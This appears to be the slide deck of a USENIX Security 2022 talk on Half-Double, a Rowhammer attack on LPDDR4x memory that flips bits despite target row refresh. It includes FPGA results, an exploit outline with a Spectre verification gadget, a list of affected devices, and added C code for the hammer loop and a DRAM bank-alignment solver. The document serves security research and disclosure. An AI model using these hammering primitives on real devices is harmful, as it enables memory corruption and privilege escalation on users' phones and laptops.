## Half-Double: Hammering From the Next Row Over

**USENIX Security 2022** 

12th August 2022







Andreas Kogler

Graz University of Technology

Yoongu Kim

Google

Eric Shiu

Rivos

Jonas Juffinger

Graz University of Technology, Lamarr

Moritz Lipp

Amazon Web Services

Mattias Nissler

Google

Salman Qazi

Google

Nicolas Boichat

Google

Daniel Gruss

Graz University of Technology

#### Motivation



#### Rowhammer

- Default refresh window of 64 ms
- Error Correcting Code (ECC)
  - Corrects only a single flip
- Target Row Refresh (TRR)
  - Refreshes the direct neighbours of hammered rows
  - Exhausted by many-sided patterns [1, 2]
- Would a perfect TRR fix Rowhammer attacks?

#### **Observed Flips**



- Short answer: No
- Hammering with three rows between the aggressors
  - Causes flips on commodity LPDDR4x devices
  - 5 out of 7 mobile devices affected
  - With TRR active and on-chip ECC enabled
- Is this *distance-2* Rowhammer?
- What is the root cause?

#### **FPGA Experiments**

| Row            | Symbol              |
|----------------|---------------------|
| Far aggressor  | $\mathcal{F}_+$     |
| Near aggressor | $\mathcal{N}_+$     |
| Victim         | $\mathcal{V}$       |
| Near aggressor | $\mathcal{N}_-$     |
| Far aggressor  | $\mathcal{F}_-$     |

- FPGA setup
  - DIMM controlled directly by the FPGA
  - Full control over refresh commands
  - TRR deactivated
  - No need to preserve data

#### **FPGA Experiments - Distance 1**



#### Distance-1

- $(\mathcal{N}_+ \to \mathcal{N}_-)^{\infty}$
- Classic double-sided Rowhammer
- **First** flip after:
  - 18 000 hammers in 1.2 ms
  - ✓ Within the refresh window
  - Mitigated by TRR

#### **FPGA Experiments - Distance 2**



#### Distance-2

- $(\mathcal{F}_+ \to \mathcal{F}_-)^{\infty}$
- Double-sided Rowhammer at distance two
- **First** flip after:
  - 4 000 000 hammers in 270 ms
  - ✗ Not within the refresh window

#### **FPGA Experiments - Half-Double**

| Row            | Symbol              |
|----------------|---------------------|
| Far aggressor  | $\mathcal{F}_+$     |
| Near aggressor | $\mathcal{N}_+$     |
| Victim         | $\mathcal{V}$       |
| Near aggressor | $\mathcal{N}_-$     |
| Far aggressor  | $\mathcal{F}_-$     |

#### Half-Double

- $((\mathcal{F}_+ \to \mathcal{F}_-)^\beta \to \mathcal{N}_+ \to \mathcal{N}_-)^\infty$
- Many distance-2 accesses interleaved with a few distance-1 accesses
- **First** flip after:
  - 296 960 hammers in 20 ms
  - Dilution $\beta = 57$ (5 120 distance-1 hammers)
  - ✓ Within the refresh window
  - ✓ Assisted by TRR
- Attacker hammers $\mathcal{F}$ (distance 2)
- TRR refreshes $\mathcal{N}$ (distance 1), supplying the near accesses
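The schedule above as a hammer loop, written here as an added example (it is not code from the Half-Double paper or its artifact). One "hammer" is one access to an aggressor pair, so with dilution $\beta$ every period is $\beta$ far hammers followed by one near hammer; `hd_schedule` counts how a hammer budget splits between the two, and `hd_hammer` performs the accesses. The four row pointers are assumed to already map to DRAM rows at the right distances (the C1 addressing work provides that); the flush is x86-only, with a plain read as the assumed fallback for uncached mappings on other ISAs.

```c
/* Added example, not code from the Half-Double paper or its artifact:
 * the access schedule ((F+ -> F-)^beta -> N+ -> N-)^inf from the slide,
 * plus a helper that counts how a hammer budget splits into distance-2
 * and distance-1 hammers. One "hammer" is one aggressor-pair access.
 * The row pointers are assumed to map to rows at the right DRAM distances. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

#if defined(__x86_64__) || defined(__i386__)
#include <x86intrin.h>
static inline void hd_access(volatile uint8_t *p) {
    (void)*p;                       /* activate the row */
    _mm_clflush((const void *)p);   /* evict so the next access reaches DRAM */
}
#else
/* Assumed fallback (e.g. an uncached mapping on ARM): a plain read suffices. */
static inline void hd_access(volatile uint8_t *p) { (void)*p; }
#endif

struct hd_rows {
    volatile uint8_t *f_plus, *f_minus;   /* far aggressors, distance 2 from the victim */
    volatile uint8_t *n_plus, *n_minus;   /* near aggressors, distance 1 from the victim */
};

struct hd_counts { size_t far_hammers, near_hammers; };

/* Each period is beta far (distance-2) hammers followed by one near
 * (distance-1) hammer; a trailing partial period holds only far hammers. */
static struct hd_counts hd_schedule(size_t beta, size_t n_hammers) {
    struct hd_counts c;
    size_t period = beta + 1;
    size_t full = n_hammers / period, rem = n_hammers % period;
    c.far_hammers  = full * beta + rem;
    c.near_hammers = full;
    return c;
}

/* Run n_hammers hammers with dilution beta; returns the number of row accesses. */
static size_t hd_hammer(const struct hd_rows *r, size_t beta, size_t n_hammers) {
    size_t accesses = 0;
    for (size_t h = 0; h < n_hammers; h++) {
        int near = (h % (beta + 1)) == beta;   /* last hammer of each period */
        hd_access(near ? r->n_plus  : r->f_plus);
        hd_access(near ? r->n_minus : r->f_minus);
        accesses += 2;
    }
    return accesses;
}

/* Constructed self-test: five fake "rows" one cache line apart, beta = 2,
 * ten hammers -> 7 far + 3 near hammers, 20 accesses. Real rows come from
 * the DRAM addressing function, not from a local buffer. */
static size_t hd_selftest(void) {
    static uint8_t buf[5 * 64];
    struct hd_rows r = { buf + 0 * 64, buf + 4 * 64, buf + 1 * 64, buf + 3 * 64 };
    return hd_hammer(&r, 2, 10);
}

int main(void) {
    struct hd_counts c = hd_schedule(57, 296960);   /* the slide's parameters */
    printf("far (distance-2) hammers: %zu, near (distance-1) hammers: %zu\n",
           c.far_hammers, c.near_hammers);
    printf("self-test accesses: %zu\n", hd_selftest());
    return 0;
}
```

With the slide's parameters ($\beta = 57$, 296 960 hammers) the split is 291 840 far hammers and 5 120 near hammers, which is the 5 120 quoted above; in the TRR-assisted variant the near accesses are not issued by the attacker at all but come from the mitigation refreshing the neighbours of the far aggressors.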

#### Exploitable in the Wild?

#### **End-to-End Exploit - Overview**



- Target PFN in Page Table Entry [3]
- C1: Allocation of Contiguous Memory
- C2: Alternative to Memory Templating
- C3: Memory Massaging
- C4: Bit-Flip Verification

#### C1 - Allocation of Contiguous Memory

$$X_0 = b_8,\qquad X_1 = b_{12} \oplus b_{16},\qquad X_2 = b_{13} \oplus b_{17},\qquad X_3 = b_{14} \oplus b_{18}$$

- Virtual-to-physical mapping is unknown to the attacker
- DRAM addressing function
  - Maps physical address bits to one of 16 DRAM banks
- Contiguous memory produces a **specific** bank access pattern
- ✓ Extract that pattern with a timing side channel
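The bank function and the contiguity check as an added example, not the paper's own solver: `dram_bank` evaluates the four bank bits from the slide on a physical address, `predict_conflicts` derives the "same bank as page 0" vector a contiguous block of pages would show, and `solve_alignment` brute-forces which of the 128 alignments of bits 12 to 18 reproduces a measured vector. The measurement itself (row-conflict timing between page pairs) is assumed and replaced here by a constructed vector; the 4 KiB page size and the 16-bank function are taken from the slide.

```c
/* Added example, not the paper's artifact: bank bits X0 = b8, X1 = b12^b16,
 * X2 = b13^b17, X3 = b14^b18 as a function of a physical address, and a
 * brute-force recovery of a page block's alignment within the 128-page
 * (512 KiB) period that those bits span. The timing measurement is assumed. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

#define PAGE_SHIFT  12
#define ALIGN_PAGES 128   /* bits 12..18 of the address: 2^7 pages */

static unsigned bit(uint64_t pa, unsigned n) { return (unsigned)((pa >> n) & 1); }

/* 4-bit bank index for the 16-bank addressing function on the slide.
 * For page-aligned addresses X0 (bit 8) is always 0. */
static unsigned dram_bank(uint64_t pa) {
    unsigned x0 = bit(pa, 8);
    unsigned x1 = bit(pa, 12) ^ bit(pa, 16);
    unsigned x2 = bit(pa, 13) ^ bit(pa, 17);
    unsigned x3 = bit(pa, 14) ^ bit(pa, 18);
    return x0 | (x1 << 1) | (x2 << 2) | (x3 << 3);
}

/* Predicted vector for n pages starting at page number base_page:
 * conflict[k] = 1 iff page k shares its bank with page 0. */
static void predict_conflicts(uint64_t base_page, size_t n, uint8_t *conflict) {
    unsigned b0 = dram_bank(base_page << PAGE_SHIFT);
    for (size_t k = 0; k < n; k++)
        conflict[k] = dram_bank((base_page + k) << PAGE_SHIFT) == b0;
}

/* Try every alignment within the 128-page period and keep those whose
 * predicted vector matches the measured one. Returns the candidate count;
 * cands[] receives the matching base page numbers (mod 128). */
static size_t solve_alignment(const uint8_t *measured, size_t n, uint8_t *cands) {
    uint8_t pred[ALIGN_PAGES];
    size_t found = 0;
    if (n > ALIGN_PAGES) n = ALIGN_PAGES;
    for (unsigned b = 0; b < ALIGN_PAGES; b++) {
        predict_conflicts(b, n, pred);
        size_t k = 1;
        while (k < n && pred[k] == measured[k]) k++;
        if (k == n) cands[found++] = (uint8_t)b;
    }
    return found;
}

/* Constructed measurement: a block that really starts 37 pages into a
 * 512 KiB period (the high address bits are arbitrary and do not enter
 * the bank function). Returns the candidate count if 37 is recovered, else -1. */
static int selftest_recover(void) {
    uint8_t measured[ALIGN_PAGES], cands[ALIGN_PAGES];
    uint64_t hidden_base = ((UINT64_C(1) << 30) >> PAGE_SHIFT) + 37;
    predict_conflicts(hidden_base, ALIGN_PAGES, measured);
    size_t n = solve_alignment(measured, ALIGN_PAGES, cands);
    for (size_t i = 0; i < n; i++)
        if (cands[i] == 37) return (int)n;
    return -1;
}

/* A vector no contiguous block can produce (every page in page 0's bank):
 * the solver must return no candidate at all. */
static size_t selftest_reject(void) {
    uint8_t all_same[ALIGN_PAGES], cands[ALIGN_PAGES];
    for (size_t k = 0; k < ALIGN_PAGES; k++) all_same[k] = 1;
    return solve_alignment(all_same, ALIGN_PAGES, cands);
}

int main(void) {
    printf("bank(0x0)=%u bank(0x100)=%u bank(0x1000)=%u bank(0x11000)=%u\n",
           dram_bank(0x0), dram_bank(0x100), dram_bank(0x1000), dram_bank(0x11000));
    printf("alignment candidates for the constructed block: %d\n", selftest_recover());
    printf("candidates for an impossible vector: %zu\n", selftest_reject());
    return 0;
}
```

Because bits 16 to 18 are XORed with bits 12 to 14, the predicted vector is a rotation of one fixed pattern, so the measured conflicts only pin down the block's alignment modulo 512 KiB; that is enough to pick aggressor and victim rows at known distances inside the block, which is all the attack needs.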



#### C2 & C3 - Memory Templating & Memory Massaging



- Skip templating
- Spray page tables
- Hammer with Half-Double

#### C4 - Bit-Flip Verification

- Corrupted page table entries can kill the attacker process

```c
if ( /* branch trained to mispredict */ ) {
    // Reached only speculatively: a fault on a corrupted or unmapped *ptr
    // is squashed, but the cache line of probe[*ptr & 1] stays loaded.
    access(probe + (*ptr & 1));
}
if ( is_cached(probe) ) {
    // ptr[0-4] valid
}
```

- Verify whether an address is safe to access before touching it
- Spectre gadget: dereference only in speculation
- Cached → accessible
- Speculative execution suppresses the fault a corrupted entry would raise

#### **End-to-End Exploit - Timings**



- 45 minutes end to end (Chromebook<sub>2</sub>)
- Full memory read & write primitive
- Deployable inside an unprivileged app

#### Final Remarks



- Open source: https://github.com/IAIK/halfdouble
- Passed artifact evaluation



- More details in the paper
  - Further experiments
  - Contiguous memory solver
  - Physical address recovery

#### References

- [1] Pietro Frigo, Emanuele Vannacci, Hasan Hassan, Victor van der Veen, Onur Mutlu, Cristiano Giuffrida, Herbert Bos, and Kaveh Razavi. TRRespass: Exploiting the Many Sides of Target Row Refresh. In: S&P. 2020.
- [2] Finn de Ridder, Pietro Frigo, Emanuele Vannacci, Herbert Bos, Cristiano Giuffrida, and Kaveh Razavi. SMASH: Synchronized Many-sided Rowhammer Attacks From JavaScript. In: USENIX Security Symposium. 2021.
- [3] Mark Seaborn and Thomas Dullien. Test DRAM for bit flips caused by the rowhammer problem. Retrieved on July 27, 2015. 2015. URL: https://github.com/google/rowhammer-test.

# Additional Slides

#### **Affected Devices**



- Tested 13 DIMMs & devices
- 2 DIMMs affected
  - FPGA analysis
  - Exact hammer counts
- 5 out of 7 mobile devices affected
  - Reverse-engineered DRAM addressing
  - Unprivileged cache flush
  - Uncachable memory (about 10x more flips)

#### Affected Devices - Flip Numbers

| System                  | RAM     | $N_{\text{Hammers}}$ | UC $0 \to 1$ | UC $1 \to 0$ | Flush $0 \to 1$ | Flush $1 \to 0$ |
|-------------------------|---------|----------------------|--------------|--------------|-----------------|-----------------|
| Chromebook<sub>1</sub>  | LPDDR4x | 23 274               | 27           | 40           | 2               | 5               |
| Chromebook<sub>2</sub>  | LPDDR4x | 23 586               | 235          | 2379         | 12              | 101             |
| OnePlus 5T              | LPDDR4x | 25 687               | 2            | 30           | 1               | 24              |
| Pixel 3                 | LPDDR4x | 32 921               | 11           | 5            | 0               | 0               |
| HTC U11                 | LPDDR4x | 21 840               | -            | -            | 3               | 17              |

UC: hammering through uncachable memory; Flush: hammering with the unprivileged cache flush. Flip counts are split by direction ($0 \to 1$ and $1 \to 0$).